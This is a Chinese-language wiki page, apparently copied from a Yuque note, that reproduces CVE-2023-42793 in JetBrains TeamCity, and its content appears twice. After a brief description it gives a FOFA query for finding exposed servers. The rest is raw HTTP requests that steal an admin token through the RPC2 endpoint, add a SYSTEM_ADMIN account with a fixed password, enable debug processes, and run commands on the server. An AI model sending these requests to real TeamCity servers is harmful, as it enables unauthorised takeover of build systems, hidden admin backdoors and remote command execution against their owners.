fofamini-wiki

登录白背景

源码

JetBrains TeamCity 远程代码执行漏洞复现【CVE-2023-42793】

一、漏洞简介

JetBrainsa TeamCity是一款出JetBrains开发的持续集成和持续交付(CICD)服务器。它提供了一个功能强大的平台，用于自动化构建、测试和部署软件项目。TeamCity旨在简化团队协作和软件交付流程，提高开发团队的效率和产品质量。JetBrainsa TeamCity可通过访问/app/rest/users/id:1/tokens/RPC2端点获取对应id用户的有效token，携带admin token访问受限端点导致远程命令执行或创建后台管理员用户。

二、影响版本

< 2023.05.04

三、资产测绘

FOFA: body="Log in to TeamCity"
特征

四、漏洞复现

创建后台管理用户

获取有效token

POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0

若响应如下，则需删除token重新发起请求

DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0

通过上一步获取的有效token，添加管理用户city_adminbg8M/Main_password!!**

POST /app/rest/users HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.a2VIeklZN0owc210RVJadmxwOUQ1Q0tDdk5v.MGExYWFmZDQtNDU2YS00MGMwLTgyYjYtYTMxNTFhMjdhN2Zj
Content-Type: application/json
Content-Length: 165

{"username": "city_adminbg8M", "password": "Main_password!!**", "email": "angry-admin@funnybunny.org", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

使用创建的管理用户登录city_adminbg8M/Main_password!!**

远程命令执行

获取有效token

POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0

若响应如下，则需删除token重新发起请求

DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0

使用上一步获取的token修改配置，启动debug模式

POST /admin/dataDir.html?action=edit&fileName=config/internal.properties&content=rest.debug.processes.enable=true HTTP/1.1
Host: 
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.a2VIeklZN0owc210RVJadmxwOUQ1Q0tDdk5v.MGExYWFmZDQtNDU2YS00MGMwLTgyYjYtYTMxNTFhMjdhN2Zj
Content-Length: 0

使用token执行命令

POST /app/rest/debug/processes?exePath=whoami&Params=/root HTTP/1.1
Host: 
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.a2VIeklZN0owc210RVJadmxwOUQ1Q0tDdk5v.MGExYWFmZDQtNDU2YS00MGMwLTgyYjYtYTMxNTFhMjdhN2Zj
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 0

原文: https://www.yuque.com/xiaokp7/ocvun2/av3hamg6ri0lgqso

# JetBrains TeamCity 远程代码执行漏洞复现【CVE-2023-42793】

# 一、漏洞简介
JetBrainsa TeamCity是一款出JetBrains开发的持续集成和持续交付(CICD)服务器。它提供了一个功能强大的平台，用于自动化构建、测试和部署软件项目。TeamCity旨在简化团队协作和软件交付流程，提高开发团队的效率和产品质量。JetBrainsa TeamCity可通过访问/app/rest/users/id:1/tokens/RPC2端点获取对应id用户的有效token，携带admin token访问受限端点导致远程命令执行或创建后台管理员用户。

# 二、影响版本

- < 2023.05.04

# 三、资产测绘

- FOFA: `body="Log in to TeamCity"`
- 特征

![image.png](./img/gpCk0V7BA2qEzApZ/1711031018432-c31d4544-5c98-4696-af25-c7b201216d52-187246.png)

# 四、漏洞复现

- 创建后台管理用户
1. 获取有效token
```
POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0
```
![image.png](./img/gpCk0V7BA2qEzApZ/1711031262871-63888ec8-9d8f-478e-b874-d2b548a1fbc5-535005.png)
若响应如下，则需删除token重新发起请求
![image.png](./img/gpCk0V7BA2qEzApZ/1711031291033-17b45c92-e269-4a52-bde9-cd725e2990df-686568.png)
```
DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0
```
![image.png](./img/gpCk0V7BA2qEzApZ/1711031362958-4119c8ad-3f8a-47f8-a456-9018e671d94d-508206.png)

2. 通过上一步获取的有效token，添加管理用户`city_adminbg8M/Main_password!!**`
```
POST /app/rest/users HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.a2VIeklZN0owc210RVJadmxwOUQ1Q0tDdk5v.MGExYWFmZDQtNDU2YS00MGMwLTgyYjYtYTMxNTFhMjdhN2Zj
Content-Type: application/json
Content-Length: 165

{"username": "city_adminbg8M", "password": "Main_password!!**", "email": "angry-admin@funnybunny.org", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
```
![image.png](./img/gpCk0V7BA2qEzApZ/1711031425571-581612dd-a94b-4238-9a31-a2b6fa01f7c4-513355.png)

3. 使用创建的管理用户登录`city_adminbg8M/Main_password!!**`

![image.png](./img/gpCk0V7BA2qEzApZ/1711031491495-b6025a11-bf8c-4617-b707-72a931656ced-651848.png)

- 远程命令执行
1. 获取有效token
```
POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0
```
![image.png](./img/gpCk0V7BA2qEzApZ/1711031262871-63888ec8-9d8f-478e-b874-d2b548a1fbc5-535005.png)
若响应如下，则需删除token重新发起请求
![image.png](./img/gpCk0V7BA2qEzApZ/1711031291033-17b45c92-e269-4a52-bde9-cd725e2990df-686568.png)
```
DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0
```
![image.png](./img/gpCk0V7BA2qEzApZ/1711031362958-4119c8ad-3f8a-47f8-a456-9018e671d94d-508206.png)

2. 使用上一步获取的token修改配置，启动`debug`模式
```
POST /admin/dataDir.html?action=edit&fileName=config/internal.properties&content=rest.debug.processes.enable=true HTTP/1.1
Host: 
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.a2VIeklZN0owc210RVJadmxwOUQ1Q0tDdk5v.MGExYWFmZDQtNDU2YS00MGMwLTgyYjYtYTMxNTFhMjdhN2Zj
Content-Length: 0
```
![image.png](./img/gpCk0V7BA2qEzApZ/1711031568688-18907ef4-4a52-4289-b3ef-334e7951f38e-750929.png)

3. 使用token执行命令
```
POST /app/rest/debug/processes?exePath=whoami&Params=/root HTTP/1.1
Host: 
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.a2VIeklZN0owc210RVJadmxwOUQ1Q0tDdk5v.MGExYWFmZDQtNDU2YS00MGMwLTgyYjYtYTMxNTFhMjdhN2Zj
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 0
```
![image.png](./img/gpCk0V7BA2qEzApZ/1711031619365-25af4a5d-44db-4863-915b-e1ebe9949d54-994659.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/av3hamg6ri0lgqso>